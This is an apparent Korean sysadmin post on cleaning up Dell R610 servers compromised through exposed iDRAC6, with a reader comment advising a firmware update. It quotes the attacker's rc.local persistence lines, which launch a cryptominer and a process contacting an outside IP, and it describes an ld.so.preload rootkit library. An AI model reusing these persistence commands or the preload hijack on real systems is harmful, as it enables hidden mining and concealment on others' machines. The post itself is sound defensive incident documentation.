특이사항으로는 다음의 공통점이 있습니다.
- iDrac이 달려 있는 Dell server (R610 제품군..)
- iDrac이 public IP로 설정 되어 있음
증상은 다음과 같습니다.
- CPU nice가 100% 사용 됨. (Nice는 shell의 nice를 의미하며, nice 우선권이 높은 cpu time을 말하므로, CPU usr 사용량이 100%라고 봐도 무방합니다.)
- find 명령을 실행하면 무조건 'file not found'
- ls 실행시에 astrik(*)가 처리되지 않음.
- rpm -Va 명령으로 변조된 binary file 여부 확인
- /etc와 /boot 의 모든 파일 검사
- rc.local 에서 다음의 내용 확인
nohup /bin/_-pud 111.111.111.111 >/dev/null&
nohup /bin/_-minerd -c /bin/_-config 2> /dev/null&
/bin/_-pud
/bin/_-minerd
/bin/_-config
/usr/bin/_-minerd - 111.111.111.111:8080 으로 접근해 보면 "mining server online" 라고 뜸. 아마 bit coin 채굴 사이트가 아닐까 의심
- 이 프로세스 kill 후 CPU nice 정상화 됨
- /etc/ld.so.preload 에 libncom.so.4.0.1 등록된 것 확인
- /lib64/libncom.so.4.0.1 이 어느 패키지에도 포함되지 않은 것 확인
- /etc/ld.so.preload 제거
- /lib64/libncom.so.4.0.1 제거
- reboot
- find 동작과, ls 시에 astrik 처리 안되는 문제 해결 됨
- rc.local 에서 다음의 내용 확인
iDrac과 _-pud로 검색을 해 보면, 2015는 9월말 경에 이 경우와 동일한 건이 1건 검색이 됩니다. 여기서는 iDrac의 firmware의 버그 때문이다는 의견과, iDrac의 암호 관리 때문이다 (모두 iDrac이 public IP로 셋팅되어 있는 경우이네요)라는 의견이 있습니다.
- http://stackoverflow.com/questions/32536518/i-cannot-start-qemu-kvm-on-a-centos-6-server
- http://www.webhostingtalk.com/showthread.php?p=9534226
일단, 이 시스템도, iDrac에 접근한 로그는 확인이 되었는데, iDrac에서 OS영역으로의 cracking을 어떻게 했는지에 대해서는 아직 확인이 되지 않았습니다. 뭐 또 제가 hacking이 주영역이 아니다 보니.. 확인하기도 좀 귀찮고.. :-)
위의 내용 참고 하시기 바랍니다. 관련 시스템들은
R610 iDrac enterprise 6 firmware 1.99(2015.07) 입니다.
Comments List
오늘 동일한 증상을 또 확인하여, 분석해 본 결과, iDrac6 에 보안홀이 있고, 여기서 root console을 이용하여 OS로 접근을 한 것이네요.
iDrac6 사용자는 firmware를 2.80 이상으로 업데이트 해야 합니다.
현 시점 최신은 2.85 입니다.
http://www.dell.com/support/home/kr/ko/bsdt1/Drivers/DriversDetails?driverId=J7YYK
보안홀 관련 수정 사항은 2.80 changelog 에서 확인할 수 있습니다.
http://www.dell.com/support/home/kr/ko/bsdt1/Drivers/DriversDetails?driverId=9Y5XD
highjacking을 하는 libncom 에 대해서는 https://packetstormsecurity.com/files/99782/Ncom-Libcall-Hijacking-Rootkit.html 를 참조 하세요.